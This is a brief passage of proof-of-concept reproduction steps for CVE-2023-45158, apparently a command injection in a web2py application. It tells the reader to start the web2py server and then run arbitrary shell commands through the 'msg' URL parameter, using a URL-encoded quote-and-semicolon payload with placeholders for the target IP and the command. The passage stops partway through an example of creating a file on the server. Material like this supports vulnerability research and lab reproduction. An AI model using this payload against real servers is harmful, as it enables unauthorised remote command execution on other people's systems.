CVE-2023-45158 Steps Run the webserver cd web2py python3 web2pypy Inject your command using the URL <IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27 Replace <IP-ADDRESS> and <YOUR-COMMAND> with your values Examples Create a file on the server <IP-ADD